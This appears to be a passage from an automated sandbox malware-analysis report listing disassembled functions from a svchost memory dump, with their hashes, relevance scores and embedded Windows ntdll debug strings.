                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 4efcb71dfb651f8d8c192371560c75c474818c55a012342e3e0663c852cbaec1
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 02E72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                                                    • Instruction ID: 43e21d13167726aae54acfae821d490b5ada3b25696db514c928ac4801e36ca8
                                                                    • Opcode Fuzzy Hash: c0f7980197824d16b6055bc5180257f02a3fceba879ef3e24b561f0a1919785d
                                                                    • Instruction Fuzzy Hash: 5951DAB6A80216BFDB10DF98C890A7EF7B8BB08304754E169E999D7641D335DE44CBE0
                                                                    Function 02EE2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                                                    • Instruction ID: c977a833c77cc004ffd3216886b9707a9ba02b15d1ef596114b5b082492eba75
                                                                    • Opcode Fuzzy Hash: 4ec8371d4a04d1757b510645aa69fa667e814640b871800a09e11368724083ed
                                                                    • Instruction Fuzzy Hash: 98510471A80645AADF30DF9CC99097FB7FDAF44204B00D459EA9BC7681E774EA04CB60
                                                                    Function 02E67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EA4725
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EA4655
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EA4742
                                                                    • ExecuteOptions, xrefs: 02EA46A0
                                                                    • Execute=1, xrefs: 02EA4713
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EA4787
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EA46FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                                                    • Instruction ID: 187028bd7dffbd486e95c81c6e3da2a3fb5ba79ee3b6fd6da248a50cc3a408ff
                                                                    • Opcode Fuzzy Hash: b8d5d315476fb5e7386095512eb314091b51f45c6781d82d0e16a409332bfd47
                                                                    • Instruction Fuzzy Hash: 2F512931AC02196AEF119AA4DC99FFEB3B9EF0434DF04A0A9E505AB180D770AE45CF50
                                                                    Function 02E7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction ID: f949fdfad2760dc8d142d0cee31748a86dcd2448bf010feee5028ed9b3e090d3
                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction Fuzzy Hash: F581B770E852499EEF24CFA8C8917FE7BB2AF4531CF18E25DE851A7290C7349940CB51
                                                                    Function 02EE20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                                                    • Instruction ID: efc82b931e4eea0f7b411b90614f3c157ee6dee3c4e4ab496341eb0ee42d6f03
                                                                    • Opcode Fuzzy Hash: b5e7e01aab0565496cf4869af94b7f50618a234e4011201e07431ea7223a4463
                                                                    • Instruction Fuzzy Hash: 3B215E76A40119ABDF10DF79C840AEEBBFDEF54748F049126EE46E3200E7309A058BA1
                                                                    Function 02E5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EA02E7
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EA02BD
                                                                    • RTL: Re-Waiting, xrefs: 02EA031E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
                                                                    • Instruction ID: 56f0549c94e3b1e31fd462b7914d8a9a8b9596c80bed3ac1655294af4b63f119
                                                                    • Opcode Fuzzy Hash: 885e5dbde6f683087bccbcc0b9d56abab0fab44485ff27304dc129a935d567a5
                                                                    • Instruction Fuzzy Hash: ABE11130698741DFD724CF28C890B6AB7E0BF86318F109A2DF9958B6D1D774E844CB92
                                                                    Function 02E6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EA728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EA7294
                                                                    • RTL: Re-Waiting, xrefs: 02EA72C1
                                                                    • RTL: Resource at %p, xrefs: 02EA72A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
                                                                    • Instruction ID: 2a7a46ca9d29e0e8ca725817f09d643d1f066586bfb20cc992ef5d2d37a04dbe
                                                                    • Opcode Fuzzy Hash: 3de2987efe4bfb37b396a8b39c649edf24c9a504a14b123f8014b7f9b192df2b
                                                                    • Instruction Fuzzy Hash: F24106717C02029BD714DE24CC41B6AB7A6FF54758F10A629FD59EB640DB20F842CBE0
                                                                    Function 02EE2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
                                                                    • Instruction ID: fb9c78d61ac050d4178b97e0a61d8ffbc19b5679b2075a106e27bdd68dabb28b
                                                                    • Opcode Fuzzy Hash: 0181edf291c8c2da8a19337e0f1590407098e660d1b7637e8f79050d9039f1b0
                                                                    • Instruction Fuzzy Hash: C9318472A402199FDB20DF28DC40BEEB7FDEB44714F449556ED4AE3240EB309A448FA0
                                                                    Function 02E39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
                                                                    • Instruction ID: 4a7b126493367a6f6948a09dc39886665364358ae148d473e66c5d4b9d7d487f
                                                                    • Opcode Fuzzy Hash: e11ffb001295df07279e20f3e7b6ccf814c2b861ca3cb56aeb86afb493324ecd
                                                                    • Instruction Fuzzy Hash: CF812C72D402699BDF358F54CC44BEEB7B8AF08754F0191EAAA09B7241D7705E84CFA0